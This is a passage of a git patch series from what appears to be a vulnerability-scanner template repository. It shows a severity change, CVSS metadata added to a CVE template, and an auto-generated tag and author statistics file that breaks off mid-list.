go,gocd,unauth,misconfig requests: - method: GET diff --git a/misconfiguration/nginx/nginx-status.yaml b/misconfiguration/nginx/nginx-status.yaml index 84b9419b5e..b0294e7dc1 100644 --- a/misconfiguration/nginx/nginx-status.yaml +++ b/misconfiguration/nginx/nginx-status.yaml @@ -3,7 +3,7 @@ id: nginx-status info: name: Nginx Status Page author: dhiyaneshDK - severity: low + severity: info tags: misconfig,nginx requests: From 21cf51bea94cbf7459cc33492ba5b9ca75c0880c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 10:59:41 +0000 Subject: [PATCH 3460/4083] Auto Generated CVE annotations [Sat Nov 6 10:59:41 UTC 2021] :robot: --- cves/2019/CVE-2019-2579.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2019/CVE-2019-2579.yaml b/cves/2019/CVE-2019-2579.yaml index b1abcfb551..b8cc27c5e2 100644 --- a/cves/2019/CVE-2019-2579.yaml +++ b/cves/2019/CVE-2019-2579.yaml @@ -9,6 +9,10 @@ info: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner tags: cve,cve2019,oracle,wcs,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2019-2579 requests: From 62d8923eef2e5ecb2658c9ac77cdc42f9c09424a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 11:30:35 +0000 Subject: [PATCH 3461/4083] Auto Generated Templates Stats [Sat Nov 6 11:30:35 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1924 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 978 insertions(+), 968 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index d81ee2bf59..bf7fa0b1d5 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":852},{"name":"lfi","count":350},{"name":"panel","count":295},{"name":"xss","count":266},{"name":"wordpress","count":262},{"name":"exposure","count":250},{"name":"rce","count":221},{"name":"tech","count":204},{"name":"wp-plugin","count":180},{"name":"cve2020","count":166},{"name":"cve2021","count":166},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":99},{"name":"token-spray","count":98},{"name":"cve2018","count":93},{"name":"iot","count":81},{"name":"apache","count":75},{"name":"oast","count":74},{"name":"takeover","count":70},{"name":"default-login","count":69},{"name":"token","count":68},{"name":"file","count":57},{"name":"cve2017","count":52},{"name":"unauth","count":50},{"name":"network","count":44},{"name":"ssrf","count":44},{"name":"","count":42},{"name":"sqli","count":41},{"name":"cve2016","count":39},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"logs","count":35},{"name":"cve2015","count":30},{"name":"misconfig","count":30},{"name":"google","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"auth-bypass","count":25},{"name":"generic","count":24},{"name":"disclosure","count":22},{"name":"misc","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"cve2011","count":15},{"name":"wp-theme","count":15},{"name":"weblogic","count":15},{"name":"php","count":15},{"name":"aws","count":15},{"name":"fuzz","count":15},{"name":"devops","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"cve2009","count":14},{"name":"deserialization","count":14},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"intrusive","count":11},{"name":"xxe","count":11},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"dell","count":10},{"name":"hp","count":10},{"name":"vmware","count":9},{"name":"gitlab","count":9},{"name":"ftp","count":9},{"name":"ibm","count":9},{"name":"kubernetes","count":9},{"name":"rails","count":9},{"name":"microsoft","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"cnvd","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"django","count":7},{"name":"files","count":7},{"name":"camera","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"jetty","count":6},{"name":"fileupload","count":6},{"name":"lucee","count":6},{"name":"drupal","count":6},{"name":"api","count":6},{"name":"phpmyadmin","count":6},{"name":"docker","count":6},{"name":"nodejs","count":6},{"name":"sitecore","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"citrix","count":6},{"name":"prometheus","count":6},{"name":"printer","count":5},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"thinkphp","count":5},{"name":"crlf","count":5},{"name":"symfony","count":5},{"name":"jolokia","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"wso2","count":5},{"name":"npm","count":4},{"name":"samsung","count":4},{"name":"firebase","count":4},{"name":"webserver","count":4},{"name":"maps","count":4},{"name":"firmware","count":4},{"name":"strapi","count":4},{"name":"enum","count":4},{"name":"bigip","count":4},{"name":"symantec","count":4},{"name":"thinkcmf","count":4},{"name":"amazon","count":4},{"name":"zabbix","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"proxy","count":4},{"name":"zimbra","count":4},{"name":"fatpipe","count":4},{"name":"glpi","count":4},{"name":"keycloak","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"rfi","count":4},{"name":"microstrategy","count":4},{"name":"artifactory","count":4},{"name":"elastic","count":4},{"name":"magmi","count":4},{"name":"solarwinds","count":4},{"name":"grafana","count":4},{"name":"slack","count":4},{"name":"traversal","count":4},{"name":"git","count":4},{"name":"hongdian","count":4},{"name":"exchange","count":4},{"name":"smtp","count":3},{"name":"terramaster","count":3},{"name":"backdoor","count":3},{"name":"zhiyuan","count":3},{"name":"lfr","count":3},{"name":"tikiwiki","count":3},{"name":"mongodb","count":3},{"name":"cloud","count":3},{"name":"minio","count":3},{"name":"openam","count":3},{"name":"linkerd","count":3},{"name":"github","count":3},{"name":"nosqli","count":3},{"name":"itop","count":3},{"name":"cve2007","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"sql","count":3},{"name":"movable","count":3},{"name":"fanruan","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"r-seenet","count":3},{"name":"exposures","count":3},{"name":"oa","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"sonicwall","count":3},{"name":"telerik","count":3},{"name":"cacti","count":3},{"name":"vbulletin","count":3},{"name":"jellyfin","count":3},{"name":"opensis","count":3},{"name":"hoteldruid","count":3},{"name":"azure","count":3},{"name":"caucho","count":3},{"name":"druid","count":3},{"name":"jeesns","count":3},{"name":"kibana","count":3},{"name":"ssh","count":3},{"name":"injection","count":3},{"name":"cves","count":3},{"name":"httpd","count":3},{"name":"search","count":3},{"name":"fpd","count":3},{"name":"kafka","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"lansweeper","count":3},{"name":"node","count":3},{"name":"bitrix","count":3},{"name":"ofbiz","count":3},{"name":"ebs","count":3},{"name":"aruba","count":2},{"name":"aviatrix","count":2},{"name":"oauth","count":2},{"name":"hikvision","count":2},{"name":"jsf","count":2},{"name":"lotus","count":2},{"name":"zeroshell","count":2},{"name":"hashicorp","count":2},{"name":"embed","count":2},{"name":"redis","count":2},{"name":"maian","count":2},{"name":"pega","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"hpe","count":2},{"name":"aspose","count":2},{"name":"axis","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"wordfence","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"netis","count":2},{"name":"fortinet","count":2},{"name":"prestashop","count":2},{"name":"icewarp","count":2},{"name":"hasura","count":2},{"name":"ilo","count":2},{"name":"kentico","count":2},{"name":"avantfax","count":2},{"name":"rstudio","count":2},{"name":"huawei","count":2},{"name":"linux","count":2},{"name":"ec2","count":2},{"name":"places","count":2},{"name":"igs","count":2},{"name":"qihang","count":2},{"name":"liferay","count":2},{"name":"globalprotect","count":2},{"name":"favicon","count":2},{"name":"rancher","count":2},{"name":"prtg","count":2},{"name":"hostheader-injection","count":2},{"name":"upload","count":2},{"name":"akkadian","count":2},{"name":"db","count":2},{"name":"text","count":2},{"name":"chiyu","count":2},{"name":"saltstack","count":2},{"name":"leak","count":2},{"name":"rockmongo","count":2},{"name":"getsimple","count":2},{"name":"nextcloud","count":2},{"name":"natshell","count":2},{"name":"jeedom","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"phpstorm","count":2},{"name":"chyrp","count":2},{"name":"python","count":2},{"name":"cache","count":2},{"name":"idea","count":2},{"name":"bruteforce","count":2},{"name":"status","count":2},{"name":"jboss","count":2},{"name":"idrac","count":2},{"name":"dolibarr","count":2},{"name":"bitly","count":2},{"name":"odoo","count":2},{"name":"openvpn","count":2},{"name":"geowebserver","count":2},{"name":"netsweeper","count":2},{"name":"ecology","count":2},{"name":"paloalto","count":2},{"name":"heroku","count":2},{"name":"adminer","count":2},{"name":"activemq","count":2},{"name":"vrealize","count":2},{"name":"openfire","count":2},{"name":"grav","count":2},{"name":"mailchimp","count":2},{"name":"qcubed","count":2},{"name":"yapi","count":2},{"name":"harbor","count":2},{"name":"plesk","count":2},{"name":"s3","count":2},{"name":"yii","count":2},{"name":"totemomail","count":2},{"name":"storage","count":2},{"name":"backups","count":2},{"name":"forcepoint","count":2},{"name":"spark","count":2},{"name":"justwriting","count":2},{"name":"frp","count":2},{"name":"linkedin","count":2},{"name":"spring","count":2},{"name":"wuzhicms","count":2},{"name":"ruby","count":2},{"name":"emerge","count":2},{"name":"cve2005","count":2},{"name":"jetbrains","count":2},{"name":"middleware","count":2},{"name":"splunk","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"nagios","count":2},{"name":"openemr","count":2},{"name":"kong","count":2},{"name":"dos","count":2},{"name":"sonarqube","count":2},{"name":"xxljob","count":2},{"name":"akamai","count":2},{"name":"vcenter","count":2},{"name":"tidb","count":2},{"name":"mida","count":2},{"name":"electron","count":2},{"name":"seeyon","count":2},{"name":"ecoa","count":2},{"name":"hjtcloud","count":2},{"name":"waf","count":2},{"name":"service","count":2},{"name":"mcafee","count":2},{"name":"webcam","count":2},{"name":"commax","count":2},{"name":"fortios","count":2},{"name":"horde","count":2},{"name":"bypass","count":2},{"name":"couchdb","count":2},{"name":"myfactory","count":2},{"name":"payara","count":2},{"name":"phpcollab","count":2},{"name":"guacamole","count":2},{"name":"flir","count":2},{"name":"rocketchat","count":2},{"name":"shellshock","count":2},{"name":"voipmonitor","count":2},{"name":"sar2html","count":1},{"name":"woocomernce","count":1},{"name":"autocomplete","count":1},{"name":"soar","count":1},{"name":"idemia","count":1},{"name":"olivetti","count":1},{"name":"circontrorl","count":1},{"name":"tamronos","count":1},{"name":"pyramid","count":1},{"name":"dotclear","count":1},{"name":"mongoshake","count":1},{"name":"announcekit","count":1},{"name":"jfrog","count":1},{"name":"timesheet","count":1},{"name":"gotmls","count":1},{"name":"74cms","count":1},{"name":"sarg","count":1},{"name":"gunicorn","count":1},{"name":"solman","count":1},{"name":"netlify","count":1},{"name":"postmessage","count":1},{"name":"fiori","count":1},{"name":"nomad","count":1},{"name":"asus","count":1},{"name":"instagram","count":1},{"name":"faraday","count":1},{"name":"parentlink","count":1},{"name":"k8s","count":1},{"name":"contentkeeper","count":1},{"name":"powercreator","count":1},{"name":"blackboard","count":1},{"name":"appveyor","count":1},{"name":"sterling","count":1},{"name":"iucn","count":1},{"name":"episerver","count":1},{"name":"javafaces","count":1},{"name":"urlscan","count":1},{"name":"chevereto","count":1},{"name":"drone","count":1},{"name":"artica","count":1},{"name":"netrc","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"miscrsoft","count":1},{"name":"mantisbt","count":1},{"name":"eprints","count":1},{"name":"postgres","count":1},{"name":"bash","count":1},{"name":"geddy","count":1},{"name":"tensorflow","count":1},{"name":"cscart","count":1},{"name":"speed","count":1},{"name":"graphql","count":1},{"name":"default","count":1},{"name":"xdcms","count":1},{"name":"geutebruck","count":1},{"name":"square","count":1},{"name":"xunchi","count":1},{"name":"graphite","count":1},{"name":"novnc","count":1},{"name":"okta","count":1},{"name":"optimizely","count":1},{"name":"wildfly","count":1},{"name":"rhymix","count":1},{"name":"vsftpd","count":1},{"name":"hiawatha","count":1},{"name":"lanproxy","count":1},{"name":"servicenow","count":1},{"name":"openweather","count":1},{"name":"couchbase","count":1},{"name":"tenda","count":1},{"name":"shoretel","count":1},{"name":"achecker","count":1},{"name":"owasp","count":1},{"name":"database","count":1},{"name":"comodo","count":1},{"name":"ems","count":1},{"name":"ns","count":1},{"name":"kindeditor","count":1},{"name":"bigbluebutton","count":1},{"name":"tink","count":1},{"name":"wooyun","count":1},{"name":"k8","count":1},{"name":"spectracom","count":1},{"name":"turbocrm","count":1},{"name":"tcexam","count":1},{"name":"fortigates","count":1},{"name":"vidyo","count":1},{"name":"discourse","count":1},{"name":"redmine","count":1},{"name":"xiuno","count":1},{"name":"dotnetnuke","count":1},{"name":"cyberoam","count":1},{"name":"cse","count":1},{"name":"api-manager","count":1},{"name":"panos","count":1},{"name":"scimono","count":1},{"name":"chinaunicom","count":1},{"name":"glowroot","count":1},{"name":"huijietong","count":1},{"name":"xampp","count":1},{"name":"clink-office","count":1},{"name":"redcap","count":1},{"name":"dvwa","count":1},{"name":"thecatapi","count":1},{"name":"smi","count":1},{"name":"postmark","count":1},{"name":"phpfastcache","count":1},{"name":"auth","count":1},{"name":"craftcms","count":1},{"name":"expressjs","count":1},{"name":"synnefo","count":1},{"name":"basic-auth","count":1},{"name":"esmtp","count":1},{"name":"webftp","count":1},{"name":"netdata","count":1},{"name":"rabbitmq","count":1},{"name":"openerp","count":1},{"name":"nexusdb","count":1},{"name":"kerbynet","count":1},{"name":"erp-nc","count":1},{"name":"jenkin","count":1},{"name":"emby","count":1},{"name":"zm","count":1},{"name":"visualstudio","count":1},{"name":"seacms","count":1},{"name":"exacqvision","count":1},{"name":"iptime","count":1},{"name":"qvisdvr","count":1},{"name":"rmi","count":1},{"name":"tika","count":1},{"name":"pcoip","count":1},{"name":"cockpit","count":1},{"name":"twitter","count":1},{"name":"empirecms","count":1},{"name":"buttercms","count":1},{"name":"hubspot","count":1},{"name":"lg-nas","count":1},{"name":"h3c-imc","count":1},{"name":"playable","count":1},{"name":"vercel","count":1},{"name":"xml","count":1},{"name":"exponentcms","count":1},{"name":"clockwork","count":1},{"name":"virustotal","count":1},{"name":"wondercms","count":1},{"name":"octobercms","count":1},{"name":"sco","count":1},{"name":"lutron","count":1},{"name":"manager","count":1},{"name":"visionhub","count":1},{"name":"hadoop","count":1},{"name":"iconfinder","count":1},{"name":"webmodule-ee","count":1},{"name":"gstorage","count":1},{"name":"embedthis","count":1},{"name":"sugarcrm","count":1},{"name":"dvr","count":1},{"name":"svn","count":1},{"name":"tensorboard","count":1},{"name":"cherokee","count":1},{"name":"memcached","count":1},{"name":"expn","count":1},{"name":"panabit","count":1},{"name":"rubedo","count":1},{"name":"sourcebans","count":1},{"name":"eyelock","count":1},{"name":"jmx","count":1},{"name":"sqlite","count":1},{"name":"cgi","count":1},{"name":"solarlog","count":1},{"name":"graylog","count":1},{"name":"digitalocean","count":1},{"name":"sentry","count":1},{"name":"pmb","count":1},{"name":"bingmaps","count":1},{"name":"openstack","count":1},{"name":"perl","count":1},{"name":"triconsole","count":1},{"name":"place","count":1},{"name":"aspnuke","count":1},{"name":"dom","count":1},{"name":"codemeter","count":1},{"name":"nordex","count":1},{"name":"htmli","count":1},{"name":"key","count":1},{"name":"jabber","count":1},{"name":"ewebs","count":1},{"name":"webex","count":1},{"name":"ecom","count":1},{"name":"octoprint","count":1},{"name":"tapestry","count":1},{"name":"redhat","count":1},{"name":"metabase","count":1},{"name":"mod-proxy","count":1},{"name":"actuator","count":1},{"name":"fontawesome","count":1},{"name":"jaspersoft","count":1},{"name":"b2evolution","count":1},{"name":"jitsi","count":1},{"name":"centos","count":1},{"name":"webctrl","count":1},{"name":"mediumish","count":1},{"name":"onelogin","count":1},{"name":"okiko","count":1},{"name":"portainer","count":1},{"name":"socomec","count":1},{"name":"particle","count":1},{"name":"cors","count":1},{"name":"avalanche","count":1},{"name":"spf","count":1},{"name":"livezilla","count":1},{"name":"whm","count":1},{"name":"karel","count":1},{"name":"mara","count":1},{"name":"pippoint","count":1},{"name":"zzzcms","count":1},{"name":"javamelody","count":1},{"name":"optiLink","count":1},{"name":"beanshell","count":1},{"name":"pgadmin","count":1},{"name":"twitter-server","count":1},{"name":"spotify","count":1},{"name":"fortilogger","count":1},{"name":"billquick","count":1},{"name":"opensns","count":1},{"name":"wavlink","count":1},{"name":"daybyday","count":1},{"name":"st","count":1},{"name":"opentsdb","count":1},{"name":"mysql","count":1},{"name":"csrfguard","count":1},{"name":"sendgrid","count":1},{"name":"blind","count":1},{"name":"tjws","count":1},{"name":"salesforce","count":1},{"name":"domxss","count":1},{"name":"clave","count":1},{"name":"weiphp","count":1},{"name":"apos","count":1},{"name":"securityspy","count":1},{"name":"cobub","count":1},{"name":"pulsesecure","count":1},{"name":"camunda","count":1},{"name":"ognl","count":1},{"name":"seeddms","count":1},{"name":"servicedesk","count":1},{"name":"haproxy","count":1},{"name":"nuxeo","count":1},{"name":"cliniccases","count":1},{"name":"streetview","count":1},{"name":"wix","count":1},{"name":"qdpm","count":1},{"name":"paypal","count":1},{"name":"ntopng","count":1},{"name":"alienvault","count":1},{"name":"meraki","count":1},{"name":"cocoon","count":1},{"name":"photo","count":1},{"name":"mpsec","count":1},{"name":"arl","count":1},{"name":"swagger","count":1},{"name":"expose","count":1},{"name":"mkdocs","count":1},{"name":"pacsone","count":1},{"name":"blue-ocean","count":1},{"name":"acme","count":1},{"name":"asana","count":1},{"name":"dotnet","count":1},{"name":"resourcespace","count":1},{"name":"cloudflare","count":1},{"name":"monitorr","count":1},{"name":"phpfusion","count":1},{"name":"circle","count":1},{"name":"myvuehelp","count":1},{"name":"razor","count":1},{"name":"landrayoa","count":1},{"name":"package","count":1},{"name":" default-login","count":1},{"name":"centreon","count":1},{"name":"intercom","count":1},{"name":"clockwatch","count":1},{"name":"accela","count":1},{"name":"tongda","count":1},{"name":"wakatime","count":1},{"name":"zenario","count":1},{"name":"discord","count":1},{"name":"selea","count":1},{"name":"ssltls","count":1},{"name":"froxlor","count":1},{"name":"dbt","count":1},{"name":"plone","count":1},{"name":"phpwiki","count":1},{"name":"nuuo","count":1},{"name":"grails","count":1},{"name":"nweb2fax","count":1},{"name":"yealink","count":1},{"name":"youtube","count":1},{"name":"office365","count":1},{"name":"mapbox","count":1},{"name":"shopware","count":1},{"name":"simplecrm","count":1},{"name":"jumpcloud","count":1},{"name":"dwsync","count":1},{"name":"mautic","count":1},{"name":"fortigate","count":1},{"name":"zmanda","count":1},{"name":"pendo","count":1},{"name":"openrestry","count":1},{"name":"tinypng","count":1},{"name":"nps","count":1},{"name":"europeana","count":1},{"name":"geocode","count":1},{"name":"messaging","count":1},{"name":"spidercontrol","count":1},{"name":"cerebro","count":1},{"name":"deviantart","count":1},{"name":"xmlchart","count":1},{"name":"calendly","count":1},{"name":"iceflow","count":1},{"name":"buildkite","count":1},{"name":"timezone","count":1},{"name":"bullwark","count":1},{"name":"logontracer","count":1},{"name":"rdp","count":1},{"name":"remkon","count":1},{"name":"fastcgi","count":1},{"name":"umbraco","count":1},{"name":"primetek","count":1},{"name":"goahead","count":1},{"name":"pagerduty","count":1},{"name":"alerta","count":1},{"name":"floc","count":1},{"name":"axiom","count":1},{"name":"metinfo","count":1},{"name":"keenetic","count":1},{"name":"plc","count":1},{"name":"stripe","count":1},{"name":"duomicms","count":1},{"name":"sgp","count":1},{"name":"rsyncd","count":1},{"name":"webui","count":1},{"name":"realteo","count":1},{"name":"monitorix","count":1},{"name":"mariadb","count":1},{"name":"influxdb","count":1},{"name":"appweb","count":1},{"name":"interlib","count":1},{"name":"darkstat","count":1},{"name":"burp","count":1},{"name":"adiscon","count":1},{"name":"netmask","count":1},{"name":"nsasg","count":1},{"name":"upnp","count":1},{"name":"robomongo","count":1},{"name":"labtech","count":1},{"name":"jenzabar","count":1},{"name":"cve2006","count":1},{"name":"uwsgi","count":1},{"name":"wifisky","count":1},{"name":"bookstack","count":1},{"name":"mailgun","count":1},{"name":"owa","count":1},{"name":"eg","count":1},{"name":"iterable","count":1},{"name":"syslog","count":1},{"name":"shoppable","count":1},{"name":"listserv","count":1},{"name":"testrail","count":1},{"name":"gurock","count":1},{"name":"finereport","count":1},{"name":"catfishcms","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"ssl","count":1},{"name":"zookeeper","count":1},{"name":"rijksmuseum","count":1},{"name":"myucms","count":1},{"name":"zyxel","count":1},{"name":"cooperhewitt","count":1},{"name":"ueditor","count":1},{"name":"circontrol","count":1},{"name":"feifeicms","count":1},{"name":"plugin","count":1},{"name":"szhe","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"dropbox","count":1},{"name":"mrtg","count":1},{"name":"csrf","count":1},{"name":"addpac","count":1},{"name":"biometrics","count":1},{"name":"lokalise","count":1},{"name":"cves2001","count":1},{"name":"zend","count":1},{"name":"pihole","count":1},{"name":"magicflow","count":1},{"name":"acexy","count":1},{"name":"tectuus","count":1},{"name":"fortiweb","count":1},{"name":"skycaiji","count":1},{"name":"anchorcms","count":1},{"name":"sureline","count":1},{"name":"directions","count":1},{"name":"circleci","count":1},{"name":"kyan","count":1},{"name":"smartsense","count":1},{"name":"emc","count":1},{"name":"gsoap","count":1},{"name":"extractor","count":1},{"name":"subrion","count":1},{"name":"gespage","count":1},{"name":"woocommerce","count":1},{"name":"opensmtpd","count":1},{"name":"alibaba","count":1},{"name":"luftguitar","count":1},{"name":"etherpad","count":1},{"name":"elfinder","count":1},{"name":"vscode","count":1},{"name":"ruckus","count":1},{"name":"dompdf","count":1},{"name":"find","count":1},{"name":"codeigniter","count":1},{"name":"dribbble","count":1},{"name":"oscommerce","count":1},{"name":"tileserver","count":1},{"name":"thinkadmin","count":1},{"name":"websphere","count":1},{"name":"mdb","count":1},{"name":"piluscart","count":1},{"name":"lotuscms","count":1},{"name":"openx","count":1},{"name":"qsan","count":1},{"name":"panasonic","count":1},{"name":"sangfor","count":1},{"name":"gateone","count":1},{"name":"roads","count":1},{"name":"smartblog","count":1},{"name":"cve202","count":1},{"name":"crm","count":1},{"name":"dnssec","count":1},{"name":"gloo","count":1},{"name":"secmail","count":1},{"name":"proftpd","count":1},{"name":"planon","count":1},{"name":"clusterengine","count":1},{"name":"nifi","count":1},{"name":"zms","count":1},{"name":"vsphere","count":1},{"name":"gitlist","count":1},{"name":"stem","count":1},{"name":"xmpp","count":1},{"name":"javascript","count":1},{"name":"apigee","count":1},{"name":"fcm","count":1},{"name":"tugboat","count":1},{"name":"ipstack","count":1},{"name":"facebook","count":1},{"name":"jnoj","count":1},{"name":"skywalking","count":1},{"name":"terraform","count":1},{"name":"mobileiron","count":1},{"name":"binance","count":1},{"name":"dreamweaver","count":1},{"name":"details","count":1},{"name":"raspap","count":1},{"name":"taiga","count":1},{"name":"nedi","count":1},{"name":"elascticsearch","count":1},{"name":"traefik","count":1},{"name":"pagespeed","count":1},{"name":"oidc","count":1},{"name":"limit","count":1},{"name":"sage","count":1},{"name":"azkaban","count":1},{"name":"wavemaker","count":1},{"name":"checkpoint","count":1},{"name":"nerdgraph","count":1},{"name":"phpshowtime","count":1},{"name":"setup","count":1},{"name":"gilacms","count":1},{"name":"wiki","count":1},{"name":"ricoh","count":1},{"name":"lighttpd","count":1},{"name":"loganalyzer","count":1},{"name":"sophos","count":1},{"name":"csod","count":1},{"name":"route","count":1},{"name":"bolt","count":1},{"name":"nette","count":1},{"name":"moin","count":1},{"name":"xvr","count":1},{"name":"websvn","count":1},{"name":"tracer","count":1},{"name":"myanimelist","count":1},{"name":"flexbe","count":1},{"name":"beanstalk","count":1},{"name":"timeclock","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"wmt","count":1},{"name":"node-red-dashboard","count":1},{"name":"minimouse","count":1},{"name":"rmc","count":1},{"name":"tor","count":1},{"name":"doh","count":1},{"name":"newrelic","count":1},{"name":"sceditor","count":1},{"name":"ilo4","count":1},{"name":"bing","count":1},{"name":"dbeaver","count":1},{"name":"jsp","count":1},{"name":"etouch","count":1},{"name":"tinymce","count":1},{"name":"strava","count":1},{"name":"yachtcontrol","count":1},{"name":"viewlinc","count":1},{"name":"majordomo2","count":1},{"name":"phalcon","count":1},{"name":"leanix","count":1},{"name":"shiro","count":1},{"name":"graph","count":1},{"name":"scs","count":1},{"name":"ambari","count":1},{"name":"mirai","count":1},{"name":"commscope","count":1},{"name":"cloudinary","count":1},{"name":"frontpage","count":1},{"name":"tpshop","count":1},{"name":"webadmin","count":1},{"name":"viewpoint","count":1},{"name":"glances","count":1},{"name":"opm","count":1},{"name":"trane","count":1},{"name":"avtech","count":1},{"name":"kafdrop","count":1},{"name":"springframework","count":1},{"name":"visualtools","count":1},{"name":"argussurveillance","count":1},{"name":"dnn","count":1},{"name":"tieline","count":1},{"name":"weglot","count":1},{"name":"aniapi","count":1},{"name":"nc2","count":1},{"name":"oneblog","count":1},{"name":"locations","count":1},{"name":"processmaker","count":1},{"name":"wamp","count":1},{"name":"plastic","count":1},{"name":"phpunit","count":1},{"name":"spip","count":1},{"name":"nearby","count":1},{"name":"maxsite","count":1},{"name":"shopxo","count":1},{"name":"pivotaltracker","count":1},{"name":"cvnd","count":1},{"name":"micro-user-service","count":1},{"name":"krweb","count":1},{"name":"sidekiq","count":1},{"name":"sonarcloud","count":1},{"name":"ioncube","count":1},{"name":"elasticsearch","count":1},{"name":"loqate","count":1},{"name":"abuseipdb","count":1},{"name":"cloudron","count":1},{"name":"concrete","count":1},{"name":"omi","count":1},{"name":"motorola","count":1},{"name":"rujjie","count":1},{"name":"opencast","count":1},{"name":"hiboss","count":1},{"name":"webmin","count":1},{"name":"travis","count":1},{"name":"totaljs","count":1},{"name":"elevation","count":1},{"name":"alertmanager","count":1},{"name":"nimble","count":1},{"name":"moinmoin","count":1},{"name":"ghost","count":1},{"name":"wp","count":1},{"name":"flink","count":1},{"name":"gitea","count":1},{"name":"bedita","count":1},{"name":"jquery","count":1},{"name":"hortonworks","count":1},{"name":"ulterius","count":1},{"name":"gridx","count":1},{"name":"distance","count":1},{"name":"geolocation","count":1},{"name":"sast","count":1},{"name":"placeos","count":1},{"name":"lancom","count":1},{"name":"aura","count":1},{"name":"calendarix","count":1},{"name":"email","count":1},{"name":"natemail","count":1},{"name":"redwood","count":1},{"name":"vnc","count":1},{"name":"maccmsv10","count":1},{"name":"eyou","count":1},{"name":"mantis","count":1},{"name":"wing-ftp","count":1},{"name":"zcms","count":1},{"name":"weather","count":1},{"name":"apiman","count":1},{"name":"gogs","count":1},{"name":"sprintful","count":1},{"name":"saltapi","count":1},{"name":"yzmcms","count":1},{"name":"acontent","count":1},{"name":"imap","count":1},{"name":"diris","count":1},{"name":"phpinfo","count":1},{"name":"fedora","count":1},{"name":"cofax","count":1},{"name":"matrix","count":1},{"name":"adb","count":1},{"name":"clickhouse","count":1},{"name":"shopizer","count":1},{"name":"fastapi","count":1},{"name":"bazarr","count":1},{"name":"klog","count":1},{"name":"dahua","count":1},{"name":"netgenie","count":1},{"name":"adafruit","count":1},{"name":"wazuh","count":1},{"name":"trilithic","count":1},{"name":"zte","count":1},{"name":"svnserve","count":1},{"name":"werkzeug","count":1},{"name":"varnish","count":1},{"name":"jeewms","count":1}],"authors":[{"name":"dhiyaneshdk","count":309},{"name":"daffainfo","count":304},{"name":"pikpikcu","count":281},{"name":"pdteam","count":208},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":76},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":60},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"nadino","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"meme-lord","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"emadshanab","count":8},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic 